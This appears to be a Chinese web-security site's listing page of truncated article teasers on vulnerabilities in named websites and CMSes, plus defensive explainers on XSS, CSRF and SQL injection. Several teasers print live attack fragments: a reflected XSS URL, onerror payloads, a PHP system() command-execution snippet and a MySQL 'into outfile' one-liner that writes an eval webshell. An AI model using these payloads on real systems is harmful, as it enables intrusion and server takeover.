SonicWALL EMail Security 7.3.5多重缺陷及修复 - 网站安关注热度:27

标题：SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities影响系统 3.5产品介绍:=============While most businesses now have some type of anti-spam protection, many must deal.....[详情]

Thinksns微博系统注入漏洞即后台拿webshell及修复关注热度:37

..[详情]

图虫网存储Xss泛滥,Xss-worm一促即发 - 网站安全关注热度:36

http://tuchong.com/273329/albums/http://tuchong.com/273329/albums/277850/3361539/http://tuchong.com/273329/albums/277850/3358396/第一个:相册名字没有转义第二个和第三个:图片名字没有转义。还有标签能随.....[详情]

实战渗透thinksns官网 - 网站安全 - 自学php关注热度:23

（本文涉及的所有漏洞已经被修复！）（由于文章是后来补写的，有些图可能无法抓到。sorry）ThinkSNS(简称TS)，开源微博引擎。一直都在看thinksns的代码，但是由于很彩笔，一直没找到什..[详情]

帝国cms 6.6最新版本后台拿webshell方法 - 网站安全关注热度:20

不知道别人有没有发过。反正我昨天搞个站自己发现的。必须分享出来！！由于我日的那个站是帝国cms 6.6最新版本的，所以网上找了一些方法都失效了！自定义页面-增加自定义页面-随..[详情]

csrf（跨站请求伪造）攻击解析 - 网站安全 - 自学关注热度:18

CSRF，全称Cross-site request forgery，中文翻译成跨站请求伪造，现在很多站点存在csrf漏洞，利用这个漏洞，攻击者假冒正常的用户，以用户的名义发送恶意请求。这些请求可能是发送邮件，..[详情]

无力的渗透–对VIP收费论坛的渗透 - 网站安全关注热度:17

一直想给大家分享一下有技术含量的文章，但是最近实在忙。又因为急于扩充博客文章。所以平时渗透的过程就记录下来，希望给大家带来收获。进入正题，以下全部由百度翻译而来，..[详情]

VBulletin 4.1.12 'blog_plugin_useradmin.php' SQL注入关注热度:22

影响版本：VBulletin 4.1.12VBulletin是一款基于PHP的论坛程序。VBulletin #39;blog_plugin_useradmin.php#39;脚本不正确过滤用户提交的输入，允许攻击者利用漏洞进行SQL注入攻击，可获得数据库信息或控..[详情]

phpwind 9测试版反射XSS+路径泄漏 - 网站安全 - 自学关注热度:11

/index.php?m=1c=forum/index.php?m=1%22%3E%3Cscript%3Ealert%28/insight/%29%3C/script%3Ec=forum修复方案：参照其他页面修补方式..[详情]

天空课堂文件上传漏洞及修复 - 网站安全 - 自学关注热度:16

允许上传危险文件类型,这个系统用的还是不少的详细说明：以前自己记录留下来的，现在才翻出来，可能不详细。，打开网络课网站，如图，登陆进去，现在网盘里传一个PHP文件，网盘..[详情]

图虫网几个跨权限BUG及修复 - 网站安全 - 自学p关注热度:24

http://tuchong.tuchong.com/2894994/ 来测试寻找:data-note-id=2532245 类似http://tuchong.tuchong.com/api/comment/delete/POST发送note_id%5B%5D=2532245删除了恩。www.2cto.comhttp://tuchong.com/mess.....[详情]

Google hacker工具使用和Google hacker防范 - 网站安全关注热度:52

本文介绍了三款Google hacking工具:Gooscan、SiteDigger和Wikto的简单使用以及针对Google hacking行为的简单防范.我们防范google hacker之前，让我们来看看谷歌黑客是什么？谷歌黑客是一种黑客技术，..[详情]

CSRF攻击实例，注入cnodejs.org官网 - 网站安全 -关注热度:34

自从我在cnodejs官网上发布了一篇关于《xss和csrf讨论》的文章后，cnodejs开始了一轮xss注入热潮，各种alert弹窗，自动回复以及修改页面等等。最后袁锋（suqian）只能将所有的markdown标签的..[详情]

关于XSS（跨站脚本攻击）和CSRF（跨站请求伪造）关注热度:22

我们常说的网络安全其实应该包括以下三方面的安全：1、机密性，比如用户的隐私被窃取，帐号被盗，常见的方式是木马。2、完整性，比如数据的完整，举个例子，康熙传位十四子，被..[详情]

友基科技网站sql注入漏洞 - 网站安全 - 自学php关注热度:20

虽然现在sql注入不像以前那么常见，但是在一些中小型网站还是会存在。如该网站某URL如图：最简单的探测sql注入漏洞的方法，就是在参数后，即332后加一个英文单引号rsquo;,观察程序反..[详情]

苏宁网站购物支付金额可修改漏洞及修复 - 网站关注热度:24

1.存在漏洞的是主站哦http://www.suning.com/emall/city_10052_10051_9264_.html2.支付漏洞，模拟下如何使用1元钱买ipad的吧，下面这张图选择一键购3.填写好想要信息之后，进入到付款页面，注意看金..[详情]

大众点评团购商家合作页面存在SQL注入漏洞 - 网关注热度:16

大众点评团购合作提交页面使用的是一个开源的调查程序LimeSurvey，其实对这个程序稍微关注的筒子都会知道这个程序有几个注入的洞洞，刚好最近闲来无事时试了下，还真发现有sql注入..[详情]

php168 v6~v7部分脚本过滤不严致可获取WEBSHELL - 网站关注热度:17

php168 v6~v7鸡肋Getshell安全问题有点鸡肋，需要条件：1.网站配置为：文章生成真静态2.允许注册会员给出v6的测试代码，提交后执行phpinfo()，v7原理一样，只是数据库字段数不一样。member..[详情]

好孩子sql注射漏洞，root权限致多台服务敏感信息关注热度:26

某注射漏洞，没想到又是root权限。结果测试，发现各种服务器基本都是清一色的统一口令。还是考虑到各种奶爸们要在你们网站注册，能做一点算一点了。详细说明：http://www.goodbaby.c..[详情]

XSS攻击的原理 - 网站安全 - 自学php关注热度:29

概念说明Xss(cross-site scripting)攻击指的是攻击者往Web页面里插入恶意html标签或者javascript代码，当用户浏览该页或者进行某些操作时，攻击者利用用户对原网站的信任，诱骗用户或浏览器..[详情]

浅谈PHP的SQL注入与应对方法 - 网站安全 - 自学p关注热度:19

SQL注入攻击是黑客攻击网站最常用的手段。如果你的站点没有使用严格的用户输入检验，那么常容易遭到SQL注入攻击。SQL注入攻击通常通过给站点数据库提交不良的数据或查询语句来实..[详情]

PHP防止暴力破解密码 - 网站安全 - 自学php关注热度:55

暴力攻击是一种不使用任何特殊手段而去穷尽各种可能性的攻击方式。它的更正式的叫法是穷举攻击穷举各种可能性的攻击。对于访问控制，典型的暴力攻击表现为攻击者通过大量的尝..[详情]

服务端输出HTML属性的几种危险情况 - 网站安全关注热度:16

没有过滤或转码直接输出code:img src=:{src} hack:img src=xxx:xonerror=alert(1)// 过滤了单引号和双引号code:img src=:{src} hack:img src=xxx:x onerror=alert(1)对内容进行了HTML实体编.....[详情]

XSS攻击过滤函数 - 网站安全 - 自学php关注热度:21

黑客用XSS攻击有多种方式,PHP的内置函数不能应对各种各样的XSS攻击。因此,使用filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags等功能也不能做到100%的防护。你需要一个更好的..[详情]

用php防止XSS跨站脚本攻击的方法 - 网站安全 - 自关注热度:25

现在很多网站都存在跨站脚本攻击漏洞,让黑客有机可乘.跨站攻击很容易就可以构造，而且非常隐蔽，不易被查觉（通常盗取信息后马上跳转回原页面）。 如何攻击，在此不作介绍，主..[详情]

Magento eCommerce Platform XXE Injection利用 - 网站安全关注热度:36

0x2今天看packetstormsecurity时看到了这个漏洞的细节：http://packetstormsecurity.org/files/114710/Magento-eCommerce-Platform-XXE-Injection.html利用方法其中也说的很明白：Proofofconcept:--------------.....[详情]

关于MySQL注入的几个语句 - 网站安全 - 自学php关注热度:24

0x1mysql报错模式下的不使用information_schema来爆表基础知识：USING用于表连接时给定连接条件，Select*fromtable1jointable2ontable1.id=table2.id；使用using可以写为Select*fromtable1jointable2using(id)（.....[详情]

php命令执行小集 - 网站安全 - 自学php关注热度:26

c4bbage@qq.com 2012.09.170x1 ob_start1?php2//http://php.net/manual/en/function.ob-start.php3$cmd=system;4ob_start($cmd);5echo $_GET[cunlide];6ob_end_flush();0x2 system1//http://php.net/ma.....[详情]

PHP FastCGI的远程利用 - 网站安全 - 自学php关注热度:26

说到FastCGI，大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式，甚至有的类型脚本这是唯一的模式（ROR，Python等）。FastCGI的主要目的..[详情]

phpmyadmin导出shell mysql导出一句话 - 网站安全 - 自关注热度:96

如果得知数据库账号密码，可通过mysql导出一句话到网站目录.导出shell代码是：select ?php @eval($_POST[#39;pass#39;]);? into outfile #39;C:/APMServ5.2.6/www/htdocs/123.php#39;;代码讲解：se.....[详情]